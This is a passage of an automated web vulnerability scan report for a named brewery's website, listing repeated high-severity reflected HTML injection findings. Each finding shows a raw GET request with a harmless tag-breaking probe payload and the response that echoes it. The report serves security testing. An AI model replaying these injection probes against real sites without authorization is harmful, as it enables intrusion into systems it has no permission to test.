Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentedf9b"><a>e851ee84c8f_page" class="contentedf9b">
...[SNIP]...

1.73. http://www.ninkasibrewing.com/content/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f19e"><a>5dbf816ffe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6f19e"><a>5dbf816ffe/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content6f19e"><a>5dbf816ffe_page" class="content6f19e">
...[SNIP]...

1.74. http://www.ninkasibrewing.com/content/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1074f"><a>3bd48f0635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1074f"><a>3bd48f0635/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content1074f"><a>3bd48f0635_page" class="content1074f">
...[SNIP]...

1.75. http://www.ninkasibrewing.com/content/css/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f27"><a>d2ed1bcbe0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content39f27"><a>d2ed1bcbe0a/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content39f27"><a>d2ed1bcbe0a_page" class="content39f27">
...[SNIP]...

1.76. http://www.ninkasibrewing.com/content/css/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de265"><a>99351a372e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentde265"><a>99351a372e/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentde265"><a>99351a372e_page" class="contentde265">
...[SNIP]...

1.77. http://www.ninkasibrewing.com/content/css/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84a9"><a>f8f239e2cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84a9"><a>f8f239e2cf0/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contenta84a9"><a>f8f239e2cf0_page" class="contenta84a9">
...[SNIP]...

1.78. http://www.ninkasibrewing.com/content/css/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6505"><a>a690865482b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd6505"><a>a690865482b/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentd6505"><a>a690865482b_page" class="contentd6505">
...[SNIP]...

1.79. http://www.ninkasibrewing.com/content/css/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db76d"><a>d3d2af91b6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentdb76d"><a>d3d2af91b6b/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentdb76d"><a>d3d2af91b6b_page" class="contentdb76d">
...[SNIP]...

1.80. http://www.ninkasibrewing.com/content/css/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e8c"><a>4b2c3c0e6c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentb1e8c"><a>4b2c3c0e6c7/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentb1e8c"><a>4b2c3c0e6c7_page" class="contentb1e8c">
...[SNIP]...

1.81. http://www.ninkasibrewing.com/content/css/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f196b"><a>845524f273a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentf196b"><a>845524f273a/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentf196b"><a>845524f273a_page" class="contentf196b">
...[SNIP]...

1.82. http://www.ninkasibrewing.com/content/img/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45663"><a>8b95a448cfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content45663"><a>8b95a448cfa/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content45663"><a>8b95a448cfa_page" class="content45663">
...[SNIP]...

1.83. http://www.ninkasibrewing.com/content/img/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1441f"><a>7fd0b4d00b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1441f"><a>7fd0b4d00b1/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content1441f"><a>7fd0b4d00b1_page" class="content1441f">
...[SNIP]...

1.84. http://www.ninkasibrewing.com/content/img/content/css/ninkasi.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718f2"><a>c3b71b0f726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content718f2"><a>c3b71b0f726/img/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content718f2"><a>c3b71b0f726_page" class="content718f2">
...[SNIP]...

1.85. http://www.ninkasibrewing.com/content/img/content/css/print.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be5a8"><a>50fc2122c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentbe5a8"><a>50fc2122c0/img/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentbe5a8"><a>50fc2122c0_page" class="contentbe5a8">
...[SNIP]...

1.86. http://www.ninkasibrewing.com/content/img/content/js/basic.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58e6"><a>673bbcd9798 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentd58e6"><a>673bbcd9798/img/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contentd58e6"><a>673bbcd9798_page" class="contentd58e6">
...[SNIP]...

1.87. http://www.ninkasibrewing.com/content/img/content/js/combined.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62b0"><a>552d9ff3d4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta62b0"><a>552d9ff3d4d/img/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="contenta62b0"><a>552d9ff3d4d_page" class="contenta62b0">
...[SNIP]...

1.88. http://www.ninkasibrewing.com/content/img/content/js/combined.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f9"><a>3827eb81fc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content874f9"><a>3827eb81fc7/img/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content874f9"><a>3827eb81fc7_page" class="content874f9">
...[SNIP]...

1.89. http://www.ninkasibrewing.com/content/img/skin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7fb"><a>d9b89a79e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1b7fb"><a>d9b89a79e3e/img/skin/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<base href="http://www.n
...[SNIP]...
<body id="content1b7fb"><a>d9b89a79e3e_page" class="content1b7fb">
...[SNIP]...

1.90. http://www.ninkasibrewing.com/content/img/skin/content/css/basic.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.ninkasibrewing.com
Path:	/content/img/skin/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 751d3"><a>fcf7cbffa31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content751d3"><a>fcf7cbffa31/img/skin/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
